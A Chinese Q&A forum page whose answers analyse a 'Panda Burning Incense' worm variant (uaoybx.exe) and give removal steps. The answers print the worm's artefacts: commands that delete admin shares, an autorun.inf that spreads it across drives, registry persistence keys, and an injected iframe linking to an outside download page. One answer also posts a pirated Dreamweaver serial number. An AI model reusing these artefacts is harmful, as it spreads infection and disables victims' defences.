uaoybx.exe是什么进程
发布网友
发布时间:2023-05-18 10:54
共5个回答
热心网友
时间:2023-09-30 16:16
“熊猫烧香”FuckJacks.exe的变种,和之前的变种一样使用白底熊猫烧香图标.
中毒后~~~~~~~~~
尝试关闭下列窗口:
QQKav
QQAV
VirusScan
Symantec AntiVirus
Duba
Windows
esteem procs
System Safety Monitor
Wrapped gift Killer
Winsock Expert
msctls_statusbar32
pjf(ustc)
IceSword
结束以下进程:
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logo1_.exe
Logo_1.exe
Rundl132.exe
禁用杀毒软件服务及其它服务:
Schele
sharedaccess
RsCCenter
RsRavMon
RsCCenter
RsRavMon
KVWSC
KVSrvXP
kavsvc
AVP
McAfeeFramework
McShield
McTaskManager
navapsvc
wscsvc
KPfwSvc
SNDSrvc
ccProxy
ccEvtMgr
ccSetMgr
SPBBCSvc
Symantec Core LC
NPFMntor
MskService
FireSvc
删除若干安全软件启动项信息:
RavTask
KvMonXP
kav
KAVPersonal50
McAfeeUpdaterUI
Network Associates Error Reporting Service
ShStatEXE
YLive.exe
yassistse
使用net share命令删除管理共享:
[Copy to clipboard]CODE:
net share X$ /del /y
net share admin$ /del /y
net share IPC$ /del /y
-----------------------------------
Then~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1.修改注册表信息中“显示所有文件和文件夹”设置,使你无法查看隐藏的文件和文件夹:
[Copy to clipboard]CODE:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000000
---------------------------------------
2.在各分区根目录生成副本:
X:\setup.exe
X:\autorun.inf
autorun.inf内容:
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe
修改注册表为如下键值:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0933cf62-8fc5-11db-a73f-806d6172696f}\Shell\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0933cf62-8fc5-11db-a73f-806d6172696f}\Shell\@
Value: String: "AutoRun"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0933cf62-8fc5-11db-a73f-806d6172696f}\Shell\Auto\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0933cf62-8fc5-11db-a73f-806d6172696f}\Shell\Auto\command\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0933cf62-8fc5-11db-a73f-806d6172696f}\Shell\Auto\command\@
Value: String: "C:\setup.exe"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0933cf62-8fc5-11db-a73f-806d6172696f}\Shell\AutoRun\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0933cf62-8fc5-11db-a73f-806d6172696f}\Shell\AutoRun\@
Value: String: "自动播放(&P)"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0933cf62-8fc5-11db-a73f-806d6172696f}\Shell\AutoRun\command\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0933cf62-8fc5-11db-a73f-806d6172696f}\Shell\AutoRun\command\@
Value: String: "C:\windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL setup.exe"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0933cf62-8fc5-11db-a73f-806d6172696f}\Shell\AutoRun\Extended
Value: String: ""
---------------------------------------
3.病毒文件的创建:
%windir%\system32下创建文件(如C:\Windows\system32):
devgt.exe Size: 31,204字节,(v5.1.0.2600)
qqhx.dat Size: 77,008字节,
twunk32.exe Size: 24,576字节,
uaoybx.dll Size: 45,136字节,
uaoybx.exe Size: 77,008字节,
windhcp.ocx Size: 41,984字节
%windir%\下创建文件(如C:\Windows):
heixia.exe Size: 77,008字节
mh.exe Size: 31,310字节,(v5.1.0.2600)
其它位置:
C:\windows\system32\drivers\spoclsv.exe
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Zt2\SVCH0ST.EXE(请与SVCHOST.EXE区别,o与0
的区别)
分区根目录生成隐藏文件setup.exe,autorun.inf
---------------------------------------
4.自启动项目及服务
自启动项目:SVCH0ST.EXE,spoclsv.exe,twunk32.exe,uaoybx.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\myZt2
Value: String: "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Zt2\SVCH0ST.EXE"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\svcshare
Value: String: "C:\windows\system32\drivers\spoclsv.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\twin
Value: String: "C:\windows\system32\twunk32.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lhjsax
Value: String: "C:\windows\system32\uaoybx.exe"
服务:注册病毒服务:Windows DHCP Service,描述为:为远程计算机注册并更新 IP 地址.服务的可执行文件路径为: C:\windows\system32\rundll32.exe windhcp.ocx,start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet004\Services\WinDHCPsvc\Description
Value: String: "为远程计算机注册并更新 IP 地址。"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet004\Services\WinDHCPsvc\DisplayName
Value: String: "Windows DHCP Service"
5.以上是病毒背地做的的事情,下面是我们将感受到的病毒威力.
(1) 电脑运行缓慢,配置差的机器会出现死机\蓝屏等症状.
(2) 任务管理器无法打开,窗口一闪即过,因此你无法使用任务管理器结束病毒进程
(3) 系统配置实用程序msconfig无法打开,窗口一闪即过.但,services.msc命令可用.
(4) 你打开浏览器想从网上获取帮助,当文字包含金山毒霸\江民\瑞星\熊猫烧香等文字时,浏览器自动关闭.
(5) cmd命令可能无法使用(本人实验过两次,一次可以用,一次是窗口一闪即过-.-).
如果cmd命令可用,请使用tasklist及taskkill命令查看及结束病毒进程.可以看到,当前系统进程包含uaoybx.exe,devgt.exe,spoclsv.exe,SVCH0ST.EXE病毒进程,使用taskkill -pid /f结束病毒进程.此时,任务管理器及msconfig可用.
PS: 以上所有操作,在中毒后未重启的情况下实验通过./安全模式可能无法使用,进入的时候会直接蓝屏.
(6) 使用杀毒软件及专杀工具查杀(见后面,记得断开网络)..................
---------------------------------------
6.其它的一些建议
(1).为爱机打补丁吧,Patch~~~~~~~~
(2).安装杀毒软件,及时升级病毒库,并打开实时防护.(应该是好的杀毒软件................)
(3).中招后,部分朋友可能倾向于Ghost或格盘重装系统.
忠告:病毒会在其它驱动器根目录产生病毒文件,使得驱动器有"自动播放"选项.重装后,系统盘应该正常,但,一定不要那么急着双击其它盘,双击后,很有可能再次中毒,功亏一篑,这也是为什么有朋友说中此病毒后,格式化所有分区的原因了.
(4)使用Win PE引导系统,手工把所有病毒文件删光光.
热心网友
时间:2023-09-30 16:17
之前网上流传的“熊猫烧香”清除方法已经无用^_^
申明,新变种无法直接del清除,量也大。需要借助部分工具。以下步骤提前集中下载。
以下操作途中不要开其他网页或自行打开本机网页等其他有可能加载网页的程序。
首发http://blog.yarfun.com 转载请注明,谢谢
一、首先下载江民的威金专杀工具,目前效果比较理想。不要想着手动结束,那只是浪费时间,让更多的文件被修改。
KV官方下载(请注意链接为官方地址)
目前此专杀不会被结束进程,可以顺利,查杀蠕虫,AUTORUN.INF、Setup.exe、SVCH0ST。
查杀后,可以运行,注册表编辑器及任务管理器,并停止网页文件的修改。
打开任务管理器。结束“uaoybx”进程。
二、下载Dreamweaver或其他网页专用字符替换工具,新手建议下载Dreamweaver,不过有点大,虽然有点大材小用,不过它的优点在于,只针对网页程序进行替换,缩短时间,操作简单。很多很小的字符替换程序,只能全部搜索或者指定一种扩展名。目前先做下载。不进行操作。
华军下载页面(请到放心地方下载程序,以免在无防护情况下出现意外)
注:不要想着自己不是Web服务器,不是站长,不接触网页程序,就省略次步骤,其蠕虫修改的htm、html也为很多软件所使用的说明书,例如Windows的安装说明、EA众多游戏的说明、部分软件的内嵌本地网页等。或许你也有以此后缀的文档。所以请不要忽略。
三、下载copylock文件,copylock可以在重启后删除、替换正在被系统占用的文件。无需安装、图标容易误导。绿色软件,不放心的朋友可以去华军下载,提供2个链接。
本地下载汉化版:CopyLock v1.09.rar
华军下载页面:copylock 1.09 简体中文汉化版 下载页面
四、由于之前使用专杀和结束了其中的“自我保护程序”(专杀结束一个SVCH0ST,手动结束一个uaoybx)此时系统暂时平静,如果杀毒软件被破坏,立即重装,并更新,暂时不要重启。不放心的朋友可以不用自己的序列号或通行证,江民的KV2007提供免费版。
***此时断网***,拔网线、断Modem都可以、pppoe不要链接就行。
五、打开copylock,如果一打开出现删除列表,请点否,并清除,当前任务列表,Ctrl+A,del,即可清除任务列表。
使用文件删除加载如下文件:
*:\\documents and settings\\用户名\\local settings\\temp\\zt2\\svch0st.exe
*:\\WINDOWS\\system32\\windhcp.ocx
*:\\WINDOWS\\system32\\uaoybx.exe
*:\\WINDOWS\\system32\\uaoybx.dll
应用,重启电脑。
六、启动后,使用之前安装并更新好的KV,杀毒QQ安装盘。以防万一随后也可以查杀一下系统盘。
七、如果有优化大师,兔子等等注册表搜索软件,就使用他们的注册表指定搜索。如果没有手动,在开始菜单->运行->regedit,回车,或者Win+r,输入regedit回车即可。搜索所有与svch0st.exe、windhcp.ocx、uaoybx.exe、uaoybx.dll有关的键值,其中有部分键值为操作记录,如果不清除的朋友,可以见一个删一个,并不多,不会很累。
八、由于它会替换所有的网页文件,内嵌网页加载蠕虫,所以必须替换,量根据感染时间和网页文件决定,我测试的时候在几分钟内,被修改3万多个网页文件。
安装之前下好的Dreamweaver,已经安装或选择其他软件的朋友跳过。
序列号:WPD800-55337-94632-05188
打开Dreamweaver后,安Ctrl+F,在“查找范围”选择“文件夹”,“搜索”选择“源代码”如下图所示:
注意,此处一定要选择,源代码。默认的内容是搜不到的。
在搜索范围的后面,的路径中,依次将你的所有分区都填写上,除了光驱与软驱外。例如C:、D:一次一个分区进行。
在“查找”中分别输入如下的代码: (会有两种)
<iframe src="http://www.ctv163.com/wuhan/down.htm" frameborder="0" width="0" height="0"> </iframe>
<iframe src="http://www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>
注意,此处没有转换字符,前后没有空格,请复制的时候留意。也请不要随意修改这段代码,否则找不到相同的代码是无法完成清除的。
“替换”留空,不输入任何字符,完成后,点击右边的“替换全部”。耐心等待搜索,由于Dreamweaver只针对网页,而蠕虫也只针对网页,所以很快便会完成,如果下方结果处,出现很多代码,证明已经被替换过来。如果点“查找全部”的话,会列出所以包含此代码的网页文件。
Dreamweaver,偶尔会因为文件过多而停止响应,可以结束后打开继续之前的替换。每次替换的时候请注意,“搜索”处为源代码,“查找”为上述代码。
此时已彻底清除蠕虫,如果不放心的朋友,请重复步骤检查。并前往微软更新补丁以及12月的安全通告补丁。如果愿意,还是推荐使用IE7。由于没有时间测试IE,另外一台IE7,无论如何访问都不会感染蠕虫。
[tags]病毒,木马,蠕虫,杀毒软件,系统安全[/tags]
热心网友
时间:2023-09-30 16:17
热心网友
时间:2023-09-30 16:18
解决办法:http://www.chinadforce.com/viewthread.php?tid=645149
热心网友
时间:2023-09-30 16:19
